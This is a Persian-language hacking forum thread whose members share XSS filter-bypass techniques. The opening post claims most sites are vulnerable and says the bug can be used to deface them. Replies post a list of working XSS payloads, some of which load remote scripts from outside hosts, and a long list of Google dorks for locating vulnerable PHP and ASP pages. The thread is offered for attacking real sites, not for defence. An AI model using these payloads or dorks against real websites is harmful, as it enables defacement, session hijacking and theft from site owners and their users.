eblisshar
ارسالها : 251
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 321
تشکر شده : 939
|
انواع بایپس های باگ XSS
درود . در این تایپک انواع بای پس های باگ خطرناک xss رو میزاریم
این باگ در 80% سایت ها وجود داره و فقط باید بایپس بشه
xss انواع مختلقی داره و بهترین روش اینجکت کد های جاوا اسکریپت با متود get هست که در قسمت سرچ و یا هر قسمتی که با متود get ارسال بشه میشه استفاده کرد
و البته فرقی هم نداره و میشه با متود post تست کرد مثل فروم ها و فیلدهای ثبت نام و غیره . برای پیدا کردن سایت های که این باگ رو دارن دورک های زیادی نوشته شده که داخل همین انجمن میتونید پیدا کنید.
باگ xss قدرت بسیار بالای داره و یکی از خظرناک ترین و رایج ترین باگ ها هست شما میتونید کار های بسیار زیادی با استفاده از این باگ کنید و حتی سایت رو دیفیس کنید
در اینجا سعی میکنیم تمام اسکریپهای بایپس این باگ رو قرار بدیم
به علت قدرت بالای این باگ و اینکه گزاشتن مستقیم کد ها در انجمن باعث اجرای کد میشه اسکریپ ها در فایل تکست گزاشته میشه
امضای کاربر : قدرت در دست ماست و دست بالای دست بسیار است ..
سیاهی لشکر نیاید به کار / یک مرد جنگی به از صد هزار
https://t.me/ebli3shar
eblisshar.ir
https://twitter.com/shayanakbari8
https://www.linkedin.com/in/shayan-akbari-b9108b171
چو ایران نباشد تن من مباد
بدین بوم و بر زنده یک تن مباد
اگر سر به سر تن به کشتن دهیم
از آن به که کشور به دشمن دهیم
|
|
| سه شنبه 24 مهر 1397 - 03:16 |
|
eblisshar
ارسالها : 251
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 321
تشکر شده : 939
|
|
| سه شنبه 24 مهر 1397 - 03:22 |
|
eblisshar
ارسالها : 251
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 321
تشکر شده : 939
|
|
| سه شنبه 24 مهر 1397 - 03:22 |
|
eblisshar
ارسالها : 251
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 321
تشکر شده : 939
|
|
| سه شنبه 24 مهر 1397 - 03:22 |
|
eblisshar
ارسالها : 251
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 321
تشکر شده : 939
|
|
| سه شنبه 24 مهر 1397 - 03:23 |
|
eblisshar
ارسالها : 251
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 321
تشکر شده : 939
|
|
| سه شنبه 24 مهر 1397 - 03:25 |
|
eblisshar
ارسالها : 251
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 321
تشکر شده : 939
|
پاسخ : 7 RE انواع بایپس های باگ XSS
کد:
Full URI uriInHTMLData() uriInHTMLComment() uriInSingleQuotedAttr() uriInDoubleQuotedAttr() uriInUnQuotedAttr()
URI Path uriPathInHTMLData() uriPathInHTMLComment() uriPathInSingleQuotedAttr() uriPathInDoubleQuotedAttr() uriPathInUnQuotedAttr()
URI Query uriQueryInHTMLData() uriQueryInHTMLComment() uriQueryInSingleQuotedAttr() uriQueryInDoubleQuotedAttr() uriQueryInUnQuotedAttr()
URI Component uriComponentInHTMLData() uriComponentInHTMLComment() uriComponentInSingleQuotedAttr() uriComponentInDoubleQuotedAttr() uriComponentInUnQuotedAttr()
URI Fragment uriFragmentInHTMLData() uriFragmentInHTMLComment() uriFragmentInSingleQuotedAttr() uriFragmentInDoubleQuotedAttr() uriFragmentInUnQuotedAttr()
امضای کاربر : قدرت در دست ماست و دست بالای دست بسیار است ..
سیاهی لشکر نیاید به کار / یک مرد جنگی به از صد هزار
https://t.me/ebli3shar
eblisshar.ir
https://twitter.com/shayanakbari8
https://www.linkedin.com/in/shayan-akbari-b9108b171
چو ایران نباشد تن من مباد
بدین بوم و بر زنده یک تن مباد
اگر سر به سر تن به کشتن دهیم
از آن به که کشور به دشمن دهیم
|
|
| سه شنبه 24 مهر 1397 - 05:01 |
|
eblisshar
ارسالها : 251
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 321
تشکر شده : 939
|
|
| سه شنبه 24 مهر 1397 - 05:04 |
|
blackwolf_iran
ارسالها : 49
عضویت: 19 /7 /1397
تشکرها : 230
تشکر شده : 150
|
پاسخ : 9 RE انواع بایپس های باگ XSS
بسیار عالی و کاربردی
این هم یک لیست خوب از پیلود های این باگ
|
|
| سه شنبه 24 مهر 1397 - 05:10 |
|
blackwolf_iran
ارسالها : 49
عضویت: 19 /7 /1397
تشکرها : 230
تشکر شده : 150
|
پاسخ : 10 RE انواع بایپس های باگ XSS
بایپس های دیگر
کد:
<details open ontoggle=confirm()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confiru006d``]>z
<a href="javascript%26colon;alert(1)">click
<a href=javascript:alert(1)>click
<script/"<a"/src=data:=".<a,[8].some(confirm)>
<svg/x=">"/onload=confirm()//
<--`<img/src=` onerror=confirm``> --!>
<svg%0Aonload=%09((prou006dpt))()//
<sCript x>;(((confirm)))``</scRipt x>
<svg </onload ="1> (_=prompt,_(1)) "">
<!--><script src=//14.rs>
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src //onload = prompt(1)
<x oncut=alert()>x
<svg onload=write()>
|
|
| سه شنبه 24 مهر 1397 - 05:11 |
|
darkshadow
ارسالها : 133
عضویت: 8 /6 /1397
تشکرها : 225
تشکر شده : 293
|
پاسخ : 11 RE دورک xss
و این هم دروکهای خوب xss برای پیدا کردن سایت
کد:
inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
inurl:/products/orkutclone/scrapbook.php?id=
inurl:/products/classified/headersearch.php?sid=
inurl:/search_results.php?search=Search&k=
inurl:/preaspjobboard//Employee/emp_login.asp?msg1=
inurl:pages/match_report.php?mid= pages/match_report.php?mid=
inurl:/notice.php?msg= /notice.php?msg=
inurl:/gen_confirm.php?errmsg= /gen_confirm.php?errmsg=
inurl:/index.php?option=com_easygb&Itemid=
inurl:/2wayvideochat/index.php?r=
inurl:/view.php?PID= /view.php?PID=
inurl:/Property-Cpanel.html?pid= /Property-Cpanel.html?pid=
inurl:/showproperty.php?id= /showproperty.php?id=
inurl:/vehicle/buy_do_search/?order_direction=
inurl:/elms/subscribe.php?course_id= /elms/subscribe.php?course_id=
inurl:/winners.php?year=2008&type= /winners.php?
inurl:/schoolmv2/html/studentmain.php?*******=
inurl:/site_search.php?sfunction= /site_search.php?sfunction=
inurl:/search.php?search_keywords= /search.php?search_keywords=
inurl:/hexjector.php?site= /hexjector.php?site=
inurl:/news.php?id= /news.php?id=
inurl:/index.php?view=help&faq=1&ref=
inurl:"contentPage.php?id="
inurl:"displayResource.php?id="
inurl:/index.php?
inurl:/info.asp?
inurl:/preaspjobboard//Employee/emp_login.asp?msg1=
inurl:/pages/match_report.php?mid= pages/match_report.php?mid=
|
|
| سه شنبه 24 مهر 1397 - 08:11 |
|
virus32
ارسالها : 44
عضویت: 26 /6 /1397
تشکرها : 159
تشکر شده : 102
|
پاسخ : 12 RE انواع بایپس های باگ XSS
سایت کاربردی جهت تست نفوذ باگ xss و دانلود ابزارها و ...
|
|
| یکشنبه 06 آبان 1397 - 05:00 |
|
virus32
ارسالها : 44
عضویت: 26 /6 /1397
تشکرها : 159
تشکر شده : 102
|
پاسخ : 13 RE انواع بایپس های باگ XSS
یک لیست از متود های جدید و حرفه ای برای بایپس باگ xss
دانلود :
|
|
| یکشنبه 06 آبان 1397 - 05:37 |
|
demon
ارسالها : 49
عضویت: 17 /2 /1397
تشکرها : 155
تشکر شده : 159
|
پاسخ : 14 RE انواع بایپس های باگ XSS
مقاله مفید و یک ابزار برای اموزش XSS (Cross Site Scripting)
|
|
| پنجشنبه 01 آذر 1397 - 20:10 |
|
